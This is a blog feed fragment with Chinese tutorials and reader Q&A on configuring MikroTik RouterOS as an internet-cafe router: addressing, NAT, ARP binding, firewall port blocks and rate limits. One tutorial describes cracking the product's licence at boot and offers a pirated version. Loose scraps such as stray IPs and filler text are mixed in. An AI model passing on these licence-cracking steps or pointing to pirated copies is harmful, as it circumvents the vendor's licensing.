<P style="TEXT-INDENT: 2em">add address 192.168.0.10/24 interface dianxin</P>
<P style="TEXT-INDENT: 2em">add address 192.168.0.11/24 interface wangtong</P>
<P style="TEXT-INDENT: 2em">add address 192.168.0.12/24 interface neiwang</P>
<P style="TEXT-INDENT: 2em">这样就设置好了dianxin、wangtong、内网这三块网卡的IP和子网掩码。24代表255.255.255.0</P>
<P style="TEXT-INDENT: 2em">我只是做实验写教程，具体IP地址还要根据你的实际情况来变动。</P>
<P style="TEXT-INDENT: 2em">添加完毕后可以用print命令来查看结果。如果发现某条有错误，用“remove 错误的编号“既可以删除</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051214234836430.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051214234836430.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">到这里IP的配置就大功告成了，我们终于可以跟文字界面说拜拜了~</P>
<P style="TEXT-INDENT: 2em">2、GHOST版的（原创）</P>
<P style="TEXT-INDENT: 2em">将下载好的G文件放在一块带有ghost的虚拟dos（我的是的MAX—dos）系统上，进ghost选择恢复镜像到全盘（千万别错了哦，是全盘镜像）。完毕重启后无需^^，余下的操作同上，我就不重复了。</P>
<P style="TEXT-INDENT: 2em">二：winbox下调试</P>
<P style="TEXT-INDENT: 2em">根据你所设的局域网IP。输入<A href="http://192.168.1.1/">http://192.168.1.1</A>(我的是192.168.1.1) 下载winbox</P>
<P style="TEXT-INDENT: 2em">得到如下图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121503232897.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121503232897.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">输入管理员用户admin，默认密码为空，如图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121504018521.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121504018521.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">第一项：interfaces。这里可以更改你的网卡名称，查看个内外网总体流量</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121504341984.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121504341984.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">查看外网流量如图：（选择网卡名称第四项traffic）</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121504453590.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121504453590.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">第二项，IP</P>
<P style="TEXT-INDENT: 2em">由于你已经填写好了内外网的IP，所以IP Addresses里无须再管了。注意事项，外网掩码请仔细询问你当地的电信或者网通部门</P>
<P style="TEXT-INDENT: 2em">2、ip routes，这里是更改你所走的网关用的，如图</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/200512151439828.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/200512151439828.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">3、IP pool（不管他）</P>
<P style="TEXT-INDENT: 2em">4、IP arp（这里是网卡mac地址与ip地址绑定，我是绑定了），具体操作，双击前面带D（代表未arp绑定）的IP地址，点tools选择copy，点OK，哈哈，前面的D就没啦，恭喜你绑定成功。</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121511044171.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121511044171.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">5、IP vrrp（不管他）</P>
<P style="TEXT-INDENT: 2em">6、IP firewall(重点哦)</P>
<P style="TEXT-INDENT: 2em">到这里了，是不是还拼不通外网啊，哈哈，没有IP伪装啊，当然上不了啊。IP—firewall—source，点加号加一条规则，第一项里面填你的设置的内网网段，不是网关哦，后面跟24，不是32哦。切记！如图</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121511919245.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121511919245.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">
</P><HR>

<P></P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwb.com/skins/Default/topicface/face1.gif" border=0></P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">能上网了吧，这时候你的软路由非常脆弱，所以，我们来给他增“墙”，本文核心，防火墙配置。</P>
<P style="TEXT-INDENT: 2em">input 设置图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051215113730276.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051215113730276.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">一些重要的端口改变图：为什么要改变端口，用途很明显，默认的大家都知道，而你所改的呢？只有你自己知道，哈哈，这就是效果！</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051215114023760.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051215114023760.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">看到没？</P>
<P style="TEXT-INDENT: 2em">比如telnet啊，winbox啊，upnp，http（这里是指访问你的路由的http端口哦）。</P>
<P style="TEXT-INDENT: 2em">forward 设置，这里控制着你网吧的安全核心，先看图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121511469572.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121511469572.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">其本都是drop drop drop。（阻止的意思啦）</P>
<P style="TEXT-INDENT: 2em">tcp/udp协议的134—139端口，445端口（把三波引进来的就是这个端口，罪大恶极，封封封！）</P>
<P style="TEXT-INDENT: 2em">500端口（这个端口是别人经常攻击你软路由的端口，也封）还有迅雷5啊，P2P啊，QQ幻想啊（你的是100M光纤就别封了，无所谓）</P>
<P style="TEXT-INDENT: 2em">output 设置，此项比较简单，但很重要，syn大家都明白吧。如图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051215115212285.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051215115212285.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">virus设置：（也很重要哦）如果你input forward 两项防火没有起到什么作用，可以在里面做个跳转，使之两项转向virus设置。</P>
<P style="TEXT-INDENT: 2em">virus设置图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051215115740727.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051215115740727.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">jump(跳转图)：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051215115857315.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051215115857315.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">哈哈，防火墙设置基本完成，不要看似简单，记住写规则的顺序：先允许，后拒绝，别说我没讲哦，否则防火墙会被你配的一团糟，你还以为你的路由很安全呢？哈哈。</P>
<P style="TEXT-INDENT: 2em">端口映射：</P>
<P style="TEXT-INDENT: 2em">这项比较简单，IP—firewall—Destination。先看图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/200512151295589.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/200512151295589.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121512922672.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121512922672.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">负载平衡：IP—firewall—connections 点Tracking 看我图设置：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051215121544172.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051215121544172.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">刚才有人问我配置怎么样，建议网卡用60元左右的吧，8139嘛最好不要用，路由的流量不小哦。慎用慎用。别的硬件倒无所谓，我想现在硬件也不会差到哪里吧，CPU，内存都是超便宜哦。</P>
<P style="TEXT-INDENT: 2em">至于网卡顺序嘛：以三块网卡为例，以我的为例，从主板显卡这边数，依次为3、2、1。</P>
<P style="TEXT-INDENT: 2em">路由水晶头做法：路由与电信的转发包同一设备，所以，你想想是用哪种接法呢？在这里卖个关子，不说。不能什么都喂给你吃哦，有得时候自己动手，学的更多更深！</P>
<P style="TEXT-INDENT: 2em">以下是引用BA_alik2008在2005-12-15 7:58:13的发言： </P>
<P style="TEXT-INDENT: 2em">我想知的是。软件稳不稳定。。。。。机子配制要不要很高的。100多台的。</P>
<P style="TEXT-INDENT: 2em">还有。能不能控制内网的每个IP 的下载上传的流量。。。。限制以后。会不会导倒内网打开网页慢的。</P>
<P style="TEXT-INDENT: 2em">我前几天就买了侠诺的路由器。它的只能限制内网的总速度的。不能对每个IP的限制。还有这样整体限制上传下载。</P>
<P style="TEXT-INDENT: 2em">会影响到内网打开网页慢。</P>
<P style="TEXT-INDENT: 2em">楼主我想知道这些的。不知大家有没有测试过的。这些问题得到解决没？</P>
<P style="TEXT-INDENT: 2em">机器配置要求不高，由于没有128的内存，我用的是256的，由于没有815的板子，我用的845的，由于没有cy1.7的CPU，我用的是2.0的，关键在网卡配置。呵 呵，ROS可以单个IP限速，不过我从来不限，防火墙配置好了，限速干什么呢？限速后玩游戏，网页都很正常。但有人提及过刷浩方问题，由于我不限速，所以，至今没发现。大家要限速的请看下面：Queues项的Simple queue：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051215133257189.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051215133257189.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">我的前面都是X，就是没有启用的意思啦，关键时候用一下，哈哈。</P>
<P style="TEXT-INDENT: 2em">以下是引用ztw138138在2005-12-16 11:14:51的发言：</P>
<P style="TEXT-INDENT: 2em">ros下怎样用命令关机？</P>
<P style="TEXT-INDENT: 2em">system—shutdown</P>
<P style="TEXT-INDENT: 2em">以下是引用alfried在2005-12-16 19:44:35的发言： </P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">我有个小问题请教以下\!</P>
<P style="TEXT-INDENT: 2em">我想不让192.168.0.12------192.168.0.99这一ip段上网,杂设置??</P>
<P style="TEXT-INDENT: 2em">具体不详，试用此方法，想上网的机器做ARP绑定，外网也绑定，这样，没有做ARP绑定的机器就上不了网了。</P>
<P style="TEXT-INDENT: 2em">以下是引用8838548在2005-12-16 22:45:55的发言：</P>
<P style="TEXT-INDENT: 2em">能不能进到操作画面在设置网卡IP地址等？一顶要在安装时设置吗</P>
<P style="TEXT-INDENT: 2em">内网IP是一定要设置好的，不然怎么连winbox？你不会来个<A href="http://0.0.0.0/">http://0.0.0.0/</A>吧，连上了winbox，再改啦。</P>
<P style="TEXT-INDENT: 2em">以下是引用逍遥一指令在2005-12-17 11:34:16的发言： </P>
<P style="TEXT-INDENT: 2em">条件允许的情况下肯定首选硬件路由器</P>
<P style="TEXT-INDENT: 2em">软路由再怎么好毕竟不能和硬件路由比,不然大家还有必要花高价购买高性能路由器吗</P>
<P style="TEXT-INDENT: 2em">正如软件防火墙能和硬件防火墙比吗?</P>
<P style="TEXT-INDENT: 2em">建议兄弟先去看看有关软路由和硬路由的文章。</P>
<P style="TEXT-INDENT: 2em">以下是引用zy3680在2005-12-17 14:42:25的发言： </P>
<P style="TEXT-INDENT: 2em">用方向键和空格选择你需要的模组功能</P>
<P style="TEXT-INDENT: 2em"><A href="http://img.pcpop.com/upimg3/2005/6/1/1027979657.jpg"><IMG src="http://img.pcpop.com/upimg3/2005/6/1/1027979657.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">楼主能不能把这些模组功能介绍一下啊,还有一般网吧需要哪些模组</P>
<P style="TEXT-INDENT: 2em">基本已帮你选择好了！</P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420082100023841</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420082100023841</guid>
    <pubDate>Mon, 10 Mar 2008 12:00:23 +0800</pubDate>
    <dcterms:modified>2008-03-10T12:00:23+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[ROS教程]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420082962016383</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">ROS教程</P>
<P style="TEXT-INDENT: 2em">
<TABLE>
<TBODY>
<TR>
<TD>
<P></P>
<P style="TEXT-INDENT: 2em">1、安装ROS</P>
<P style="TEXT-INDENT: 2em">除了自己学习和测试用ROS外，最好还是单独用一台机器，相信这也不用多说，安装的时候要注意的是硬盘一定要接在IDE0上面，并且作为主盘MASTER，光驱随便，很多安装之后不能正常启动的都是这个问题、用安装光盘启动后，如图1</P>
<P style="TEXT-INDENT: 2em">图1<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_03f5477e519d1af.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">选择 i 进入安装界面选择需要安装的package，图2 </P>
<P style="TEXT-INDENT: 2em">图2<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_6ccfa1499ce47e3.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">选择完后，再按i安装，y确定，再按n不保存旧配置。最后回车重新启动，这时进入ROS是未注册的版本，如图4</P>
<P style="TEXT-INDENT: 2em">图4<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_b9d037fafa62c95.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">用光驱启动，在启动菜单按c破解，图5 </P>
<P style="TEXT-INDENT: 2em">图5<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_70b01f85dbc5c0d.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">破解之后进入已经没有了未注册提示。。。见图6</P>
<P style="TEXT-INDENT: 2em">图3<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_e5adbbde2039a49.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">2、服务端配置</P>
<P style="TEXT-INDENT: 2em">/interface pri&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 能显示出你现在可用的网卡。如图6 </P>
<P style="TEXT-INDENT: 2em">图6<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_a489ab2f43188ac.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">/ip address </P>
<P style="TEXT-INDENT: 2em">add address=192.168.1.1/24 interface=ether1&nbsp;&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">设置ether1为内网IP，其中192.168.1.1/24添自己的内网IP ，设置成功没有提示，可以用pri查看</P>
<P style="TEXT-INDENT: 2em">见图7 </P>
<P style="TEXT-INDENT: 2em">图7<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_125b6717961160c.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">3、winbox配置（所有配置都在这里进行）</P>
<P style="TEXT-INDENT: 2em">在局域网其他机器IE浏览器192.168.1.1 进入WEBBOX，左边可以下载WINBOX，当然如果你已经有WINBOX可以省略这步。打开WINBOX输入IP和用户名连接（图8） </P>
<P style="TEXT-INDENT: 2em">图8<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_b4bf8d07a583d14.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">进入配置界面</P>
<P style="TEXT-INDENT: 2em">(1)点左侧INTERFACE，双击ether1将name改为lan，同样将另两个改为cnc和tel。图9 </P>
<P style="TEXT-INDENT: 2em">图9<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_7c4a59c9489fb4b.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">(2)左侧IP-&gt;ADDRESS ,+号,分别设置CNC和TEL的IP地址,添网通和电信给的IP/子网掩码(不要和我的一样...),红*部分是自动添加的.图10</P>
<P style="TEXT-INDENT: 2em">图10<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_518b0962cc82599.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">(3)IP-&gt;ROUTE,+号添加默认的网关,默认网通就添网通网关，默认电信就添电信的网关，这里默认电信.</P>
<P style="TEXT-INDENT: 2em">如图11,正常下黑圈处为AS,黄圈出为TEL.comment设注释为tel</P>
<P style="TEXT-INDENT: 2em">图11<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_c6a5b13d8262d2a.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">(4)IP-&gt;FIREWALL,NAT选项卡,+号添加chain:srcnat,src.addr:192.168.1.0/24,ACTION选项卡里为masquerade.OK,现在可以通过电信上网了.图12</P>
<P style="TEXT-INDENT: 2em">图12<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_23ddd4d3e2b45a4.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">(5) 上传路由表文件cnc.rsc,如图13</P>
<P style="TEXT-INDENT: 2em">图13<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_6358477a4a06c86.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">在WINBOX中，NEW TERMINAL,输入import cnc完成.如图14 </P>
<P style="TEXT-INDENT: 2em">图14<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_4a9cd9dd4ef6971.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">现在已经可以电信网通自动切换了.</P>
<P style="TEXT-INDENT: 2em">(6)只是切换也不太安全,一定要配制一下防火墙么，同5一样,上传防火墙的RSC文件到192.168.1.1,在NEW TERMINAL里执行import firewall,整体和第5步相近.</P>
<P style="TEXT-INDENT: 2em">(7)配置的差不多了,该改管理员账号了,左侧USERS,双击ADMIN改个名字和右下脚的password,如果不需要远程修改ROS的话,可以设定访问IP,192.168.1.0/24之类的~~~</P>
<P style="TEXT-INDENT: 2em">图16<IMG src="http://www.routerbbs.com/attachment/Mon_0602/59_22957_546161ea61a98ec.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">至此,基本OK了.</P>
<P style="TEXT-INDENT: 2em">第一次写教程用了2个多小时呵呵..有什么不完整的地方欢迎大家补充，大家可以从本站下载ROS 2.9.6破解版。也可以直接找我，QQ:273393171</P>
<P style="TEXT-INDENT: 2em">ros软路由========================================================================</P>
<P style="TEXT-INDENT: 2em">将该硬盘挂在要做路由电脑上，注意必须接在第一个IDE并且是主硬盘接口。插上一张网卡，这是接内网的LAN。</P>
<P style="TEXT-INDENT: 2em">开机，出现登陆提示。用户:admin&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 密码：空</P>
<P style="TEXT-INDENT: 2em">输入setup再按两次A&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">在ether1后面输入你的内网IP，如：192.168.0.254/24 （这里/24是24位掩码，与255.255.255.0算法一样）</P>
<P style="TEXT-INDENT: 2em">输入完ip后，按两次x退出，现在可以可以ping通192.168.0.254了，也可用winbox在图形界面下访问路由了。</P>
<P style="TEXT-INDENT: 2em">关机，插上另一张网卡，这个是接外网的，即WAN，现在可以去掉软路由电脑的显示器和键盘了。</P>
<P style="TEXT-INDENT: 2em">开机，运行winbox以admin身份登陆</P>
<P style="TEXT-INDENT: 2em">添加外网网卡。在ip---address里按+，address输入你的外网ip和掩码位，比如218.56.37.11/29。network和BROADCAST不填，INTERFACE里选择ethr2</P>
<P style="TEXT-INDENT: 2em">增加外网网关。ip-routes按+，Destination用默认的0.0.0.0/0 ，Gateway输入外网网关，比如218.56.37.10</P>
<P style="TEXT-INDENT: 2em">实现NAT转发：IP-FIREWALL在NAT里点+，在ACTION里选masquerade</P>
<P style="TEXT-INDENT: 2em">现在该路由已经做好雏形，可以正常上网了。</P>
<P style="TEXT-INDENT: 2em">ROS菜单含义</P>
<P style="TEXT-INDENT: 2em">guanlian</P>
<P style="TEXT-INDENT: 2em">interfaces---网络接口</P>
<P style="TEXT-INDENT: 2em">wireless---无线网络</P>
<P style="TEXT-INDENT: 2em">bridge---桥接</P>
<P style="TEXT-INDENT: 2em">ppp-虚拟拨号</P>
<P style="TEXT-INDENT: 2em">ip</P>
<P style="TEXT-INDENT: 2em">ports--端口</P>
<P style="TEXT-INDENT: 2em">queues-限速</P>
<P style="TEXT-INDENT: 2em">drivers-设备</P>
<P style="TEXT-INDENT: 2em">system</P>
<P style="TEXT-INDENT: 2em">files-文件&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 备份/恢复</P>
<P style="TEXT-INDENT: 2em">log--系统日志</P>
<P style="TEXT-INDENT: 2em">snmp-snmp管理方式</P>
<P style="TEXT-INDENT: 2em">users-用户</P>
<P style="TEXT-INDENT: 2em">radius-radius管理</P>
<P style="TEXT-INDENT: 2em">tools-工具</P>
<P style="TEXT-INDENT: 2em">new terminal-命令方式</P>
<P style="TEXT-INDENT: 2em">telnet--tlenet连接方式</P>
<P style="TEXT-INDENT: 2em">password--修改密码</P>
<P style="TEXT-INDENT: 2em">certificate---证书 哎，盗版</P>
<P style="TEXT-INDENT: 2em">madk supout.rif 制作rif文件</P>
<P style="TEXT-INDENT: 2em">manual--说明</P>
<P style="TEXT-INDENT: 2em">isdn chanels--一线通方式</P>
<P style="TEXT-INDENT: 2em">routing--路由</P>
<P style="TEXT-INDENT: 2em">exit--退出</P>
<P style="TEXT-INDENT: 2em">ip addr add addr=192.168.1.1/24 interface=ether1</P>
<P style="TEXT-INDENT: 2em">ip addr add addr=58.213.126.58/30 interface=ether2</P>
<P style="TEXT-INDENT: 2em">ip route add gateway=58.213.126.57&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 外网</P>
<P style="TEXT-INDENT: 2em">ip firewall nat add chain=srcnat src-address=192.168.1.0/24 action=masquerade</P>
<P style="TEXT-INDENT: 2em">222.190.124.46</P>
<P style="TEXT-INDENT: 2em">218。94。132。50天之骄傲</P>
<P style="TEXT-INDENT: 2em">ipipipiipipipipipipipipipipip</P>
<P style="TEXT-INDENT: 2em">sys reset </P>
<P style="TEXT-INDENT: 2em">__________________________________</P>
<P style="TEXT-INDENT: 2em">addresses--ip地址</P>
<P style="TEXT-INDENT: 2em">routers-路由表</P>
<P style="TEXT-INDENT: 2em">pool-地址池</P>
<P style="TEXT-INDENT: 2em">arp-帮定ip</P>
<P style="TEXT-INDENT: 2em">vrrp-热备份</P>
<P style="TEXT-INDENT: 2em">firewall-防火墙</P>
<P style="TEXT-INDENT: 2em">socks-代理</P>
<P style="TEXT-INDENT: 2em">upnp-自动端口映射</P>
<P style="TEXT-INDENT: 2em">traffic flow-网络流量</P>
<P style="TEXT-INDENT: 2em">accounting--合计</P>
<P style="TEXT-INDENT: 2em">services--服务</P>
<P style="TEXT-INDENT: 2em">packing-ros模块</P>
<P style="TEXT-INDENT: 2em">neighbors--邻居ros用户</P>
<P style="TEXT-INDENT: 2em">dns--</P>
<P style="TEXT-INDENT: 2em">proxy-代理</P>
<P style="TEXT-INDENT: 2em">dhcp client-dhcp客户端</P>
<P style="TEXT-INDENT: 2em">dhcp server - dhcp服务</P>
<P style="TEXT-INDENT: 2em">dhcp relay-dhcp转换</P>
<P style="TEXT-INDENT: 2em">hospot-热点认证</P>
<P style="TEXT-INDENT: 2em">telephony-电话</P>
<P style="TEXT-INDENT: 2em">ipsec-ip隧道连接方式</P>
<P style="TEXT-INDENT: 2em">web proxy web代理</P>
<P style="TEXT-INDENT: 2em">system system system system system system</P>
<P style="TEXT-INDENT: 2em">---------------------------------------------</P>
<P style="TEXT-INDENT: 2em">identity---ros标示</P>
<P style="TEXT-INDENT: 2em">clock-时间</P>
<P style="TEXT-INDENT: 2em">resources-系统配置</P>
<P style="TEXT-INDENT: 2em">license-注册信息</P>
<P style="TEXT-INDENT: 2em">packages--安装包</P>
<P style="TEXT-INDENT: 2em">auto upgrade-自动升级</P>
<P style="TEXT-INDENT: 2em">logging--日志</P>
<P style="TEXT-INDENT: 2em">history--历史日志</P>
<P style="TEXT-INDENT: 2em">console---com控制台</P>
<P style="TEXT-INDENT: 2em">scripts--脚本</P>
<P style="TEXT-INDENT: 2em">scheduler--进程</P>
<P style="TEXT-INDENT: 2em">watchdog--监视狗</P>
<P style="TEXT-INDENT: 2em">reboot-从起</P>
<P style="TEXT-INDENT: 2em">shutdown-关机</P>
<P style="TEXT-INDENT: 2em">lcd-小液晶显示ros消息</P>
<P style="TEXT-INDENT: 2em">ntp chient--ros时间客户端</P>
<P style="TEXT-INDENT: 2em">ntp server---ros时间服务端 自动更新ros时间 </P>
<P style="TEXT-INDENT: 2em">health---ros情况</P>
<P style="TEXT-INDENT: 2em">ups-ups电源，可持续电源，就是电瓶。汗~</P>
<P style="TEXT-INDENT: 2em">tools tools tools tools tools tools</P>
<P style="TEXT-INDENT: 2em">--------------------------------------</P>
<P style="TEXT-INDENT: 2em">ping </P>
<P style="TEXT-INDENT: 2em">macping 探测mac地址</P>
<P style="TEXT-INDENT: 2em">traceroute---Tracert命令</P>
<P style="TEXT-INDENT: 2em">bandwidth test-宽带测试</P>
<P style="TEXT-INDENT: 2em">btest server--btest服务器</P>
<P style="TEXT-INDENT: 2em">traffic monitor--数据报监视器</P>
<P style="TEXT-INDENT: 2em">packet sniffer--数据报扫描</P>
<P style="TEXT-INDENT: 2em">torch--察看客户机信息</P>
<P style="TEXT-INDENT: 2em">mac server mac 服务器</P>
<P style="TEXT-INDENT: 2em">graphing---曲线图</P>
<P style="TEXT-INDENT: 2em">ip sacan--ip扫描</P>
<P style="TEXT-INDENT: 2em">ping speed--ping 速度</P>
<P style="TEXT-INDENT: 2em">flood ping --ping阻塞</P>
<P style="TEXT-INDENT: 2em">netwatch--网络监视</P>
<P style="TEXT-INDENT: 2em">================================================================================</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Router OS 配置手册 (网吧)</P>
<P style="TEXT-INDENT: 2em">一&nbsp;&nbsp;初始安装</P>
<P style="TEXT-INDENT: 2em">1 启动后，用用户名：admin&nbsp;&nbsp;密码空登入</P>
<P style="TEXT-INDENT: 2em">1运行 Setup</P>
<P style="TEXT-INDENT: 2em">2选a ,配制ip和网关</P>
<P style="TEXT-INDENT: 2em">3再选a 添加一个IP地址，这时会询问你哪一个接口，一般是直接回车，再输入一个IP和子网掩码</P>
<P style="TEXT-INDENT: 2em">4现在可以用routerOS自带的专用工具进行设置了.打开IE 输入地址：http://内网IP</P>
<P style="TEXT-INDENT: 2em"></P>
